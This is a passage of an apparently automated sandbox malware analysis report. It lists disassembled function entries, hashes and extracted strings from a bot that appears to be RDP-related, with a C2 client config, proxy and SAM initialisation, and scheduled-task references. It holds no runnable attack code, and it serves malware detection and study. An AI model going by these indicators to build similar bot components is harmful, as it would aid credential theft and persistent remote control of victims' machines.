                                                                    • Opcode Fuzzy Hash: 8cfad7c4b0e55ec5b44f591262298208453b317aa6e890f299361d1c5236cc2b
                                                                    • Instruction Fuzzy Hash: EA51BF75E08E8289E7204B2AE8443BD6260AF65BB4F1403B1D97D276F9EF3DE5458708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
                                                                    • API String ID: 1004003707-2347851921
                                                                    • Opcode ID: e26b1e82ba213bdeac2db0122a6682aea35194a75556812099b17318ff97c822
                                                                    • Instruction ID: 3ef29497e7bd9435708a3c5a7a36bb6a96e98401f5c450755d1856f5180a313a
                                                                    • Opcode Fuzzy Hash: e26b1e82ba213bdeac2db0122a6682aea35194a75556812099b17318ff97c822
                                                                    • Instruction Fuzzy Hash: 73414CA2A08E43A2FB358B96ED403F82359BB05368F4855FAD94D466B4DF7CE949C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                    • API String ID: 1004003707-2349658452
                                                                    • Opcode ID: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
                                                                    • Instruction ID: 06b77c3c7681eb53dae9f8ed27ca40066037d47036496841c89b796c070d4e09
                                                                    • Opcode Fuzzy Hash: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
                                                                    • Instruction Fuzzy Hash: FE4128A2A09747D6FA399F44E8407F42360FF84348F548536EAED461B5DF7CA589CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                    • API String ID: 1004003707-2349658452
                                                                    • Opcode ID: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                                                                    • Instruction ID: c15bfa137e634cc4dd857d245af7ba52f5040189427bb8b6a6207b226fde54c7
                                                                    • Opcode Fuzzy Hash: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                                                                    • Instruction Fuzzy Hash: 44413D62A086C7B6FA588B80F9803F86361BF55348F858572EACD072B5DF7EE545C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                    • API String ID: 1004003707-2349658452
                                                                    • Opcode ID: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
                                                                    • Instruction ID: bbcab5e9244ed78a17956093324efe887db5af59465590b7a66326604333b6dc
                                                                    • Opcode Fuzzy Hash: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
                                                                    • Instruction Fuzzy Hash: 1D412BF1B09647A6FA108B65E9407F4A360BF44B88F454537EACD461B6EF3CE649C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
                                                                    • API String ID: 1004003707-1509792781
                                                                    • Opcode ID: f792173b0e578962ef9365bfd6f3c26f9cd031187eb4373aed34ba9aa0a52550
                                                                    • Instruction ID: f3339fa06efa0be0a890af10cb65f45a9839e9815ebde56035c5f98f15e8d9c4
                                                                    • Opcode Fuzzy Hash: f792173b0e578962ef9365bfd6f3c26f9cd031187eb4373aed34ba9aa0a52550
                                                                    • Instruction Fuzzy Hash: C34144A1A08E47A2FB219F93E8417B82359BF01379F4445FADA0D5A6B5DF7CE946C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                    • API String ID: 1004003707-693788558
                                                                    • Opcode ID: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                                                                    • Instruction ID: a8dde3b8a8a8a1797a92f2c5df2f7f4766913c659597bd1a46e22c4fafa3fb06
                                                                    • Opcode Fuzzy Hash: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                                                                    • Instruction Fuzzy Hash: 5F411E62A0C6D7B1FB148B90E9D07B42250AF92398F448176DECD0B5B5DF7EE646C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp
                                                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                    • API String ID: 1004003707-693788558
                                                                    • Opcode ID: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
                                                                    • Instruction ID: 964e6340aafc2f67cf2cbb4e23e8c9e7bf39a4d522465e298b29b8f5faf1e9a5
                                                                    • Opcode Fuzzy Hash: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
                                                                    • Instruction Fuzzy Hash: 7B416AB1A08683A5FA10CB15E9403F86361EF44B88F458537DACD0A5B6EF3DE68AC340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                    • API String ID: 285244410-3859226547
                                                                    • Opcode ID: ee54715b658a427df2823cff30e7a3d730bd8b0e3773518bcc4b045b142db727
                                                                    • Instruction ID: 3aa917dc62f6abb4a2ee6a97b24f5db7b4e4ca1f984ab85bdd1ddc9aa5f9281f
                                                                    • Opcode Fuzzy Hash: ee54715b658a427df2823cff30e7a3d730bd8b0e3773518bcc4b045b142db727
                                                                    • Instruction Fuzzy Hash: 64311262E0DD1795FB119B87E844379276AAF44B64F9884B9C84D4B7B4EE2CEC45C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                    • API String ID: 285244410-3859226547
                                                                    • Opcode ID: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
                                                                    • Instruction ID: 81237b5a8cbeaa394d6effe3b18185732daf2eb2999510cf525084fec6dbfd63
                                                                    • Opcode Fuzzy Hash: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
                                                                    • Instruction Fuzzy Hash: FF314BA6F0DB0781FA70AF45E8507B52361EF40B84F48A535D9DD4B3B4EE6CA886CB41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                    • API String ID: 285244410-3859226547
                                                                    • Opcode ID: 6b97ee3234c651920c8c1a1ff33919908fcda3b5c0fddfd470832151c2fc4ccf
                                                                    • Instruction ID: b3003424d6305474d2983aa683bb881f79c1c819e8ad5c0a8a15d32dab49f516
                                                                    • Opcode Fuzzy Hash: 6b97ee3234c651920c8c1a1ff33919908fcda3b5c0fddfd470832151c2fc4ccf
                                                                    • Instruction Fuzzy Hash: 77312361E0EA0791FA309F59E8507F567A1AF44B84F488032C9CD5B3B8FE2DE946CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                    • API String ID: 285244410-3859226547
                                                                    • Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                    • Instruction ID: d7fa3a8d52e38b02f219b28ca624418a3da589a11ae84b349f0459f3565033c9
                                                                    • Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                    • Instruction Fuzzy Hash: 26313864E0DAD7B1FE158B49E8C03B92361AF46B90F588071C9CD1B3B1EE2EE8459343
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                    • API String ID: 285244410-3859226547
                                                                    • Opcode ID: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
                                                                    • Instruction ID: f809e5bcf29454bc53b3a8097ba045c2767ebd1db967445710e23fdffe2e75d2
                                                                    • Opcode Fuzzy Hash: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
                                                                    • Instruction Fuzzy Hash: 63310761F0EA17A1FA109B15E8503B523B1BF44B84F598537CCDD5B2B6EE2CA945C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                                                    • API String ID: 3179112426-3318474754
                                                                    • Opcode ID: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
                                                                    • Instruction ID: ed68d24cb66e49d7caeb881e0ffb7285cc576de9af170e7eaab7acede10a531b
                                                                    • Opcode Fuzzy Hash: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
                                                                    • Instruction Fuzzy Hash: 3731E6B1E1C767E2FB345F55A5C03B82260EF49344E641133C6DE4A2B2DF5DA985DB02
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                                                    • API String ID: 3179112426-2019511216
                                                                    • Opcode ID: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
                                                                    • Instruction ID: c637efb9595c78f8449e50da212b71eccb3b25cf6f4bd80c1af265ce5ffb3c6c
                                                                    • Opcode Fuzzy Hash: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
                                                                    • Instruction Fuzzy Hash: ED31E860F0C70B82FB205714A4D03B92263BF09744FA41937C5DE462F7DEAEA9859755
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcpy
                                                                    • String ID: *$schtasks
                                                                    • API String ID: 2790333442-2394224502
                                                                    • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                    • Instruction ID: 39fc3c938a3d0d6631c54484298379970f1079e6dbdc789be71e3b1b02a6b22c
                                                                    • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                    • Instruction Fuzzy Hash: 9251D712A4C68385F771AF25A8553F95751AF89784F580035EACE473EAFE3DD9448F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                                                    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                                                    • API String ID: 3537583691-1494920791
